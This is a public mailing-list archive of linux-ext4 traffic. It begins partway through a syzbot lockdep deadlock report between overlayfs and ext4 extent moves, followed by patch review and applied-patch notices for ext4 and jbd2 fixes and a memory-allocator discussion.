       do_backing_file_write_iter fs/backing-file.c:226 [inline]
       backing_file_write_iter+0x5e7/0x950 fs/backing-file.c:274
       ovl_write_iter+0x2fd/0x3d0 fs/overlayfs/file.c:370
       new_sync_write fs/read_write.c:595 [inline]
       vfs_write+0x629/0xba0 fs/read_write.c:688
       ksys_pwrite64 fs/read_write.c:795 [inline]
       __do_sys_pwrite64 fs/read_write.c:803 [inline]
       __se_sys_pwrite64 fs/read_write.c:800 [inline]
       __x64_sys_pwrite64+0x19c/0x230 fs/read_write.c:800
       do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
       do_syscall_64+0x174/0x580 arch/x86/entry/syscall_64.c:94
       entry_SYSCALL_64_after_hwframe+0x77/0x7f

-> #0 (&ovl_i_mutex_key[depth]){+.+.}-{4:4}:
       check_prev_add kernel/locking/lockdep.c:3165 [inline]
       check_prevs_add kernel/locking/lockdep.c:3284 [inline]
       validate_chain kernel/locking/lockdep.c:3908 [inline]
       __lock_acquire+0x15a5/0x2cf0 kernel/locking/lockdep.c:5237
       lock_acquire+0x106/0x350 kernel/locking/lockdep.c:5868
       down_write+0x3a/0x50 kernel/locking/rwsem.c:1625
       inode_lock include/linux/fs.h:1029 [inline]
       lock_two_nondirectories+0xe7/0x180 fs/inode.c:1254
       ext4_move_extents+0x20f/0x3950 fs/ext4/move_extent.c:589
       __ext4_ioctl fs/ext4/ioctl.c:1657 [inline]
       ext4_ioctl+0x3092/0x4b40 fs/ext4/ioctl.c:1922
       vfs_ioctl fs/ioctl.c:51 [inline]
       __do_sys_ioctl fs/ioctl.c:597 [inline]
       __se_sys_ioctl+0xff/0x170 fs/ioctl.c:583
       do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
       do_syscall_64+0x174/0x580 arch/x86/entry/syscall_64.c:94
       entry_SYSCALL_64_after_hwframe+0x77/0x7f

other info that might help us debug this:

 Possible unsafe locking scenario:

       CPU0                    CPU1
       ----                    ----
  rlock(sb_writers#4);
                               lock(&ovl_i_mutex_key[depth]);
                               lock(sb_writers#4);
  lock(&ovl_i_mutex_key[depth]);

 *** DEADLOCK ***

1 lock held by syz.0.22/5968:
 #0: ffff88803ea9c480 (sb_writers#4){.+.+}-{0:0}, at: mnt_want_write_file+0x63/0x210 fs/namespace.c:537

stack backtrace:
CPU: 0 UID: 0 PID: 5968 Comm: syz.0.22 Not tainted syzkaller #0 PREEMPT_{RT,(full)} 
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 04/18/2026
Call Trace:
 <TASK>
 dump_stack_lvl+0xe8/0x150 lib/dump_stack.c:120
 print_circular_bug+0x2e1/0x300 kernel/locking/lockdep.c:2043
 check_noncircular+0x12e/0x150 kernel/locking/lockdep.c:2175
 check_prev_add kernel/locking/lockdep.c:3165 [inline]
 check_prevs_add kernel/locking/lockdep.c:3284 [inline]
 validate_chain kernel/locking/lockdep.c:3908 [inline]
 __lock_acquire+0x15a5/0x2cf0 kernel/locking/lockdep.c:5237
 lock_acquire+0x106/0x350 kernel/locking/lockdep.c:5868
 down_write+0x3a/0x50 kernel/locking/rwsem.c:1625
 inode_lock include/linux/fs.h:1029 [inline]
 lock_two_nondirectories+0xe7/0x180 fs/inode.c:1254
 ext4_move_extents+0x20f/0x3950 fs/ext4/move_extent.c:589
 __ext4_ioctl fs/ext4/ioctl.c:1657 [inline]
 ext4_ioctl+0x3092/0x4b40 fs/ext4/ioctl.c:1922
 vfs_ioctl fs/ioctl.c:51 [inline]
 __do_sys_ioctl fs/ioctl.c:597 [inline]
 __se_sys_ioctl+0xff/0x170 fs/ioctl.c:583
 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
 do_syscall_64+0x174/0x580 arch/x86/entry/syscall_64.c:94
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7fb592a3ce59
Code: ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 e8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffc3443e838 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
RAX: ffffffffffffffda RBX: 00007fb592cb5fa0 RCX: 00007fb592a3ce59
RDX: 0000200000000040 RSI: 00000000c028660f RDI: 0000000000000005
RBP: 00007fb592ad2d6f R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
R13: 00007fb592cb5fac R14: 00007fb592cb5fa0 R15: 00007fb592cb5fa0
 </TASK>


---
This report is generated by a bot. It may contain errors.
See https://goo.gl/tpsmEJ for more information about syzbot.
syzbot engineers can be reached at syzkaller@googlegroups.com.

syzbot will keep track of this issue. See:
https://goo.gl/tpsmEJ#status for how to communicate with syzbot.

If the report is already addressed, let syzbot know by replying with:
#syz fix: exact-commit-title

If you want syzbot to run the reproducer, reply with:
#syz test: git://repo/address.git branch-or-commit-hash
If you attach or paste a git patch, syzbot will apply it before testing.

If you want to overwrite report's subsystems, reply with:
#syz set subsystems: new-subsystem
(See the list of subsystem names on the web dashboard)

If the report is a duplicate of another one, reply with:
#syz dup: exact-subject-of-another-report

If you want to undo deduplication, reply with:
#syz undup

^ permalink raw reply

* Re: [PATCH v2] common/defrag: skip defrag tests on DAX-enabled filesystems
From: Darrick J. Wong @ 2026-06-04 14:54 UTC (permalink / raw)
  To: Disha Goel
  Cc: fstests, linux-ext4, linux-fsdevel, linux-xfs, ritesh.list,
	ojaswin
In-Reply-To: <20260604122305.39805-1-disgoel@linux.ibm.com>

On Thu, Jun 04, 2026 at 05:53:05PM +0530, Disha Goel wrote:
> Online defragmentation is not supported on ext4 DAX-enabled filesystems.
> The ext4 defrag ioctl (EXT4_IOC_MOVE_EXT) returns EOPNOTSUPP when used
> on DAX files.
> 
> Add an ext4-specific check in _require_defrag() to skip tests when DAX
> is enabled, avoiding false failures on ext4/301-304, ext4/308, and
> generic/018.
> 
> XFS defrag works with DAX, so this check is ext4-specific.
> 
> Signed-off-by: Disha Goel <disgoel@linux.ibm.com>
> Reviewed-by: Ojaswin Mujoo <ojaswin@linux.ibm.com>
> ---
> Changes in v2:
> - Made the check ext4-specific as XFS defrag works with DAX
>   (feedback from Darrick)
> - Use __scratch_uses_fsdax() instead of grepping MOUNT_OPTIONS
> - Removed unnecessary comment as _notrun message is self-explanatory
> 
>  common/defrag | 4 ++++
>  1 file changed, 4 insertions(+)
> 
> diff --git a/common/defrag b/common/defrag
> index 055d0d0e..f17271cd 100644
> --- a/common/defrag
> +++ b/common/defrag
> @@ -6,6 +6,10 @@
>  
>  _require_defrag()
>  {
> +    if [ "$FSTYP" = "ext4" ] && __scratch_uses_fsdax; then

Shouldn't this be:

	ext4)
		__scratch_uses_fsdax && _notrun "..."
		;;

in the case statement below?

--D

> +        _notrun "ext4 online defrag not supported with DAX"
> +    fi
> +
>      case "$FSTYP" in
>      xfs)
>          # xfs_fsr does preallocates, require "falloc"
> -- 
> 2.45.1
> 

^ permalink raw reply

* Re: [RFC v8 0/7] ext4: fast commit: snapshot inode state for FC log
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
  To: Zhang Yi, Andreas Dilger, Li Chen
  Cc: Theodore Ts'o, Steven Rostedt, Masami Hiramatsu,
	Mathieu Desnoyers, linux-ext4, linux-trace-kernel, linux-kernel
In-Reply-To: <20260515091829.194810-1-me@linux.beauty>


On Fri, 15 May 2026 17:18:20 +0800, Li Chen wrote:
> (This RFC v8 series is rebased onto linux-next master as of 2026-05-09,
> commit e98d21c170b0 ("Add linux-next specific files for 20260508"), and
> depends on patch "ext4: fix fast commit wait/wake bit mapping on
> 64-bit" [0]).
> 
> Zhang Yi in RFC v3 review pointed out that postponing lockdep assertions only
> masks the issue, and that sleeping in ext4_fc_track_inode() while holding
> i_data_sem can form a real ABBA deadlock if the fast commit writer also needs
> i_data_sem while the inode is in FC_COMMITTING.
> 
> [...]

Applied, thanks!

[1/7] ext4: fast commit: snapshot inode state before writing log
      commit: e9c6e0b8e096255feb71ec996c77bdfbe9c36e91
[2/7] ext4: lockdep: handle i_data_sem subclassing for special inodes
      commit: 7f473f971382d73a58e386afa7efdaac294b89f0
[3/7] ext4: fast commit: avoid waiting for FC_COMMITTING
      commit: b3060e96533dc3157fc6d3d45dc19927c566977b
[4/7] ext4: fast commit: avoid self-deadlock in inode snapshotting
      commit: 2b9b216628fd9352f9c791701c8990d05736aa90
[5/7] ext4: fast commit: avoid i_data_sem by dropping ext4_map_blocks() in snapshots
      commit: 22d887e06a57261df58404c8dce50c4ef37549ed
[6/7] ext4: fast commit: add lock_updates tracepoint
      commit: d2f6e83bbbef31169ea363af4277f5c09c914eda
[7/7] ext4: fast commit: export snapshot stats in fc_info
      commit: 56bb0b64f4b198bad5ce674509c10793d471148f

Best regards,
-- 
Theodore Ts'o <tytso@mit.edu>

^ permalink raw reply

* Re: [PATCH] ext4: fix LOGFLUSH shutdown ordering to allow ordered-mode data writeback
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
  To: linux-ext4, Zhang Yi
  Cc: Theodore Ts'o, linux-fsdevel, linux-kernel, adilger.kernel,
	libaokun, jack, ojaswin, ritesh.list, yi.zhang, yizhang089,
	yangerkun, yukuai
In-Reply-To: <20260424104201.1930823-1-yi.zhang@huaweicloud.com>


On Fri, 24 Apr 2026 18:42:01 +0800, Zhang Yi wrote:
> In EXT4_GOING_FLAGS_LOGFLUSH mode, the EXT4_FLAGS_SHUTDOWN flag was set
> before calling ext4_force_commit().  This caused ordered-mode data
> writeback (triggered by journal commit) to fail with -EIO, since
> ext4_do_writepages() checks for the shutdown flag.  The journal would
> then be aborted prematurely before the commit could succeed.
> 
> Fix this by calling ext4_force_commit() first, then setting the
> shutdown flag, so that pending data can be written back correctly.
> 
> [...]

Applied, thanks!

[1/1] ext4: fix LOGFLUSH shutdown ordering to allow ordered-mode data writeback
      commit: d99748ef1695ce17eaf51c64b7a06952fa7cddab

Best regards,
-- 
Theodore Ts'o <tytso@mit.edu>

^ permalink raw reply

* Re: [PATCH 10/17] jbd2: replace __get_free_pages() with kmalloc()
From: Matthew Wilcox @ 2026-06-04 14:46 UTC (permalink / raw)
  To: Theodore Tso
  Cc: Mike Rapoport, Jan Kara, Mark Fasheh, Joel Becker, Joseph Qi,
	Ryusuke Konishi, Viacheslav Dubeyko, Trond Myklebust,
	Anna Schumaker, Chuck Lever, Jeff Layton, NeilBrown,
	Olga Kornievskaia, Dai Ngo, Tom Talpey, Alexander Viro,
	Christian Brauner, Jan Kara, Dave Kleikamp, Miklos Szeredi,
	Andreas Hindborg, Breno Leitao, Kees Cook, Tigran A. Aivazian,
	linux-kernel, linux-fsdevel, ocfs2-devel, linux-nilfs, linux-nfs,
	jfs-discussion, linux-ext4, linux-mm
In-Reply-To: <ximvn6jwgtam665a4droqkp73o55kwvd5uukyidwjesmysobth@oe7rigpsjfkz>

I'm hoping you'll take my "Remove special jbd2 slabs" patch instead of
this one, but answering here anyway ...

On Thu, Jun 04, 2026 at 10:05:52AM -0400, Theodore Tso wrote:
> On Thu, Jun 04, 2026 at 09:14:57AM +0300, Mike Rapoport wrote:
> > There's no memory overhead when order == 1.
> > As for the CPU overhead, the difference for the fast path allocations is
> > not measurable and for the slow path it is anyway determined by the amount
> > of reclaim involved rather than by what allocator is used.
> 
> Thanks for confirming!
> 
> > Larger allocations (> PAGE_SIZE * 2) go straight to the page allocator.

That is a detail subject to change.  I have some ideas ...

What users are guaranteed is that kmalloc returns physically contiguous
memory.  And that if it's a power-of-two that it's naturally aligned.

> Another question: Today, we can either use kmalloc() (or
> __get_free_pages, previously) or vmalloc().  Is there a way a file
> system can say, "give me physically contiguous pages if possible, but
> if it's too hard --- with some TBD to specify what 'too hard' means or
> can be specified --- fall back to a vmalloc-style approach, with the
> page table / TLB overhead that this might imply"?
> 
> I suppose we could do it with kmalloc() with some flags which to
> prevent forced reclaim / compaction, and if that fails, then fall back
> to vmalloc().  Is there a better way?

I think we'd like to avoid doing that.  A lot of code has various
workarounds for deficiencies in the memory allocator (some of which have
been fixed and thus the workarounds only complicate matters).  If the
memory allocator(s) aren't providing what you need (be it performance
under load, fragmentation avoidance or whatever), it's best to get that
fixed rather than having fallback paths.

There have been people who have suggested "What if folios could be
physically discontiguous", and sometimes I've hhumoured them, but the
simplifications enabled by requiring folios to be contiguous are quite
immense.

We've been trying to move in the direction of exposing more high-level
APIs so people can say "I want to allocate 10MB of memory but it doesn't
need to be contiguous" and have the allocator either fail the whole
thing up front or make efforts to ensure that you get the whole 10MB.
It's a lot more efficient than calling get_free_page() 2500 times
and possibly having reclaim run a dozen different times.

(anyone else try to create a brd that's actually larger than system ram?
;-)

^ permalink raw reply

* Re: [PATCH v6 0/2] ext4: add hash Kunit tests and optimize str2hashbuf
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
  To: Andreas Dilger, Baokun Li, Jan Kara, Ojaswin Mujoo,
	Ritesh Harjani, Zhang Yi, Guan-Chun Wu
  Cc: Theodore Ts'o, linux-ext4, linux-kernel, edward062254,
	visitorckw, david.laight.linux
In-Reply-To: <20260531080019.3794809-1-409411716@gms.tku.edu.tw>


On Sun, 31 May 2026 16:00:17 +0800, Guan-Chun Wu wrote:
> This series adds Kunit tests for fs/ext4/hash.c and refactors
> the str2hashbuf_{signed,unsigned}() helpers.
> 
> Patch 1 adds test coverage for ext4fs_dirhash(), including the main
> hash variants and relevant edge cases.
> 
> Patch 2 simplifies the str2hashbuf helper implementation by processing
> input in 4-byte chunks and removing function-pointer dispatch. This also
> reduces overhead and shows roughly 2x improvement on longer inputs in
> local testing.
> 
> [...]

Applied, thanks!

[1/2] ext4: add Kunit coverage for directory hash computation
      commit: 3147cac6c1929f26b4687993b8c7af5b7b34496d
[2/2] ext4: improve str2hashbuf by processing 4-byte chunks and removing function pointers
      commit: 3ca1d19c1971ac4f25478eafb741e726bf2d5954

Best regards,
-- 
Theodore Ts'o <tytso@mit.edu>

^ permalink raw reply

* Re: [PATCH] ext4: fix fast commit wait/wake bit mapping on 64-bit
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
  To: Li Chen
  Cc: Theodore Ts'o, Andreas Dilger, Baokun Li, Jan Kara,
	Ojaswin Mujoo, Ritesh Harjani, Zhang Yi, linux-ext4, linux-kernel,
	Sashiko AI review
In-Reply-To: <20260513085818.552432-1-me@linux.beauty>


On Wed, 13 May 2026 16:58:17 +0800, Li Chen wrote:
> On 64-bit, ext4 dynamic inode states live in the upper half of i_flags,
> and ext4_test_inode_state() applies the corresponding +32 offset.
> 
> The fast-commit wait and wake paths open-coded the wait key with the raw
> EXT4_STATE_* value. Add small helpers for the state wait word and bit,
> and use them for the FC_COMMITTING and FC_FLUSHING_DATA waits so the wait
> key follows the same mapping as the state helpers.
> 
> [...]

Applied, thanks!

[1/1] ext4: fix fast commit wait/wake bit mapping on 64-bit
      commit: 8b3bc93fee6771775243665a0cf31857d6659775

Best regards,
-- 
Theodore Ts'o <tytso@mit.edu>

^ permalink raw reply

* Re: [PATCH v2] jbd2: fix integer underflow in jbd2_journal_initialize_fast_commit()
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
  To: Jan Kara, Harshad Shirwadkar, Junrui Luo
  Cc: Theodore Ts'o, linux-ext4, linux-kernel, Yuhao Jiang, stable
In-Reply-To: <SYBPR01MB7881663C927DE9D7BBF4D1DFAF062@SYBPR01MB7881.ausprd01.prod.outlook.com>


On Wed, 13 May 2026 17:28:40 +0800, Junrui Luo wrote:
> jbd2_journal_initialize_fast_commit() validates journal capacity by
> checking (journal->j_last - num_fc_blks < JBD2_MIN_JOURNAL_BLOCKS).
> Both j_last and num_fc_blks are unsigned, so when num_fc_blks exceeds
> j_last the subtraction wraps to a large value, bypassing the bounds
> check.
> 
> The resulting underflow corrupts j_last, j_fc_first, and j_free,
> leading to journal abort.
> 
> [...]

Applied, thanks!

[1/1] jbd2: fix integer underflow in jbd2_journal_initialize_fast_commit()
      commit: 289a2ca0c9b7eae74f93fc213b0b971669b8683d

Best regards,
-- 
Theodore Ts'o <tytso@mit.edu>

^ permalink raw reply

* Re: [PATCH] jbd2: check for aborted handle in jbd2_journal_dirty_metadata()
From: Theodore Ts'o @ 2026-06-04 14:45 UTC (permalink / raw)
  To: jack, Deepanshu Kartikey
  Cc: Theodore Ts'o, linux-ext4, linux-kernel,
	syzbot+98f651460e558a21baae
In-Reply-To: <20260507050605.50081-1-kartikey406@gmail.com>


On Thu, 07 May 2026 10:36:05 +0530, Deepanshu Kartikey wrote:
> jbd2_journal_dirty_metadata() unconditionally dereferences
> handle->h_transaction at function entry to obtain the journal pointer:
> 
> 	transaction_t *transaction = handle->h_transaction;
> 	journal_t *journal = transaction->t_journal;
> 
> However, h_transaction may legitimately be NULL for an aborted handle.
> The is_handle_aborted() helper in include/linux/jbd2.h explicitly
> treats !h_transaction as one of the aborted states:
> 
> [...]

Applied, thanks!

[1/1] jbd2: check for aborted handle in jbd2_journal_dirty_metadata()
      commit: 8fc197cf366beaabaeb46575c8cf46fe5076b943

Best regards,
-- 
Theodore Ts'o <tytso@mit.edu>

^ permalink raw reply


This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox